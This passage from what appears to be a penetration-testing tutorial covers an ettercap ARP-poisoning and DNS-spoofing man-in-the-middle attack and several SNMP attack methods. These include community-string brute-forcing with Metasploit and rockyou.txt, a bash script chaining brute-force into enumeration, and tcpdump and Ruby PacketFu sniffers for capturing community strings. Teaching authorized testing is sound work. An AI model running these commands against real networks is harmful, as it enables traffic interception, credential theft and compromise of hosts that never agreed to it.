2. Now that our DNS server records are set up, we can invoke ettercap. Invoking ettercap is pretty straightforward; here's the usage specification:

ettercap [OPTIONS] [TARGET1] [TARGET2]

3. To perform a MITM attack using ettercap, you need to supply the -M switch and pass it an argument indicating the MITM method you'd like to use. In addition, you will also need to specify that you'd like to use the DNS spoofing plugin. Here's what the invocation will look like:

ettercap -M arp:remote -P dns_spoof [TARGET1] [TARGET2]

Here, TARGET1 and TARGET2 are the host you want to intercept and either the default gateway or the DNS server, interchangeably. To target the host at address 192.168.10.106 with a default gateway of 192.168.10.1, you will invoke the following command:

ettercap -M arp:remote -P dns_spoof /192.168.10.106//192.168.10.1/

Once launched, ettercap will begin poisoning the ARP tables of the specified hosts and listen for any DNS requests to the domains it's configured to resolve.

Interrogating servers

For any network device to participate in communication, certain information needs to be accessible to it; no device will be able to look up a domain name or find an IP address without the participation of devices in charge of certain information. In this section, we will detail some techniques you can use to interrogate common network components for sensitive information about your target network and the hosts on it.

SNMP interrogation

The Simple Network Management Protocol (SNMP) is used by routers and other network components to support remote monitoring of things such as bandwidth, CPU/memory usage, hard disk space usage, logged-on users, running processes, and a number of other incredibly sensitive collections of information.
Naturally, any penetration tester with an exposed SNMP service on their target network will need to know how to extract any potentially useful information from it.

About SNMP Security

SNMP services before version 3 are not designed with security in mind. Authentication to these services often comes in the form of a simple string of characters called a community string. Another common implementation flaw inherent to SNMP versions 1 and 2 is the ability to brute-force and eavesdrop on communication.

To enumerate SNMP servers for information using the Kali Linux tools, you could resort to a number of techniques. The most obvious one will be snmpwalk, and you can use it by issuing the following command:

snmpwalk -v [1 | 2c | 3] -c [community string] [target host]

For example, let's say we were targeting 192.168.10.103 with a community string of public, which is a common community string setting; you will then invoke the following command to get information from the SNMP service:

snmpwalk -v 1 -c public 192.168.10.103

Here, we opted to use SNMP version 1, hence the -v 1 in the invocation of the preceding command. The output will look something like the following screenshot:

As you can see, this actually extracts some pretty detailed information about the targeted host. Whether this is a critical vulnerability or not will depend on which kind of information is exposed. On Microsoft Windows machines and some popular router operating systems, SNMP services could expose user credentials and even allow remote attackers to augment them maliciously, should they have write access to the SNMP database.

Exploiting SNMP successfully often depends strongly on the device implementing the service. You could imagine that for routers, your target will probably be the routing table or the user accounts on the device. For other host types, the attack surface may be quite different. Try to assess the risk of SNMP-based flaws and information leaks with respect to the host and possibly the wider network it's hosted on. Don't forget that SNMP is all about sharing information, information that other hosts on your network probably trust. Think about the kind of information accessible and what you will be able to do with it should you have the ability to influence it. If you can attack the host, attack the hosts that trust it.

Another collection of tools is really great at collecting information from SNMP services: the snmp_enum, snmp_login, and similar scripts available in the Metasploit Framework. The snmp_enum script pretty much does exactly what snmpwalk does, except it structures the extracted information in a friendlier format. This makes it easier to understand. Here's an example:

msfcli auxiliary/scanner/snmp/snmp_enum [OPTIONS] [MODE]

The options available for this module are shown in the following screenshot:

Here's an example invocation against the host in our running example:

msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=192.168.10.103

The preceding command produces the following output:

You will notice that we didn't specify the community string in the invocation. This is because the module assumes a default of public. You can specify a different one using the COMMUNITY parameter.

In other situations, you may not always be lucky enough to know the community string being used in advance. However, luckily, SNMP versions 1, 2, and 2c do not inherently have any protection against brute-force attacks, nor do they use any form of network-based encryption.
In the case of SNMP versions 1 and 2c, you could use a nifty Metasploit module called snmp_login that will run through a list of possible community strings and determine the level of access the enumerated strings give you. You can use it by running the following command:

msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=192.168.10.103

The preceding command produces the following output:

As seen in the preceding screenshot, once the run is complete, it will list the enumerated strings along with the level of access granted. The snmp_login module uses a static list of possible strings to do its enumeration by default, but you could also run this module against some of the password lists that ship with Kali Linux, as follows:

msfcli auxiliary/scanner/snmp/snmp_login PASS_FILE=/usr/share/wordlists/rockyou.txt RHOSTS=192.168.10.103

This will use the rockyou.txt wordlist to look for strings to guess with. Because all of these Metasploit modules are command line-driven, you can of course combine them. For instance, if you'd like to brute-force a host for the SNMP community strings and then run the enumeration module on the strings it finds, you can do this by crafting a bash script, as shown in the following example:

#!/bin/bash
if [ $# != 1 ]
then
  echo "USAGE: . snmp [HOST]"
  exit 1
fi
TARGET=$1
echo "[*] Running SNMP enumeration on '$TARGET'"
for comm_string in `msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=$TARGET E 2> /dev/null | awk -F' ' '/access with community/ { print $2 }'`;
do
  echo "[*] found community string '$comm_string' ...running enumeration";
  msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=$TARGET COMMUNITY=$comm_string E 2> /dev/null;
done

The following command shows you how to use it:

. snmp.sh [TARGET]

In our running example, it is used as follows:

. snmp.sh 192.168.10.103

Other than guessing or brute-forcing SNMP community strings, you could also use TCPDump to filter out any packets that could contain unencrypted SNMP authentication information. Here's a useful example:

tcpdump udp port 161 -i eth0 -vvv -A

The preceding command will produce the following output:

Without going too much into detail about the SNMP packet structure, looking through the printable strings captured, it's usually pretty easy to see the community string. You may also want to look at building a more comprehensive packet-capturing tool using something such as Scapy, which is available in Kali Linux versions.
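Scapy itself is Python-based; as a rough Ruby equivalent (staying in the language used for the Metasploit modules in this compilation), the PacketFu library that ships with Metasploit can capture and parse the same traffic. The following is only a sketch under that assumption:

require 'packetfu'

# Watch for SNMP traffic on udp/161 and print any printable payload
# strings, which is typically where v1/v2c community strings appear.
cap = PacketFu::Capture.new(:iface => 'eth0', :start => true,
                            :filter => 'udp port 161')
cap.stream.each do |raw|
  pkt = PacketFu::Packet.parse(raw)
  next unless pkt.is_udp?
  strings = pkt.payload.scan(/[[:print:]]{4,}/)
  puts "#{pkt.ip_saddr} -> #{pkt.ip_daddr}: #{strings.join(' ')}"
end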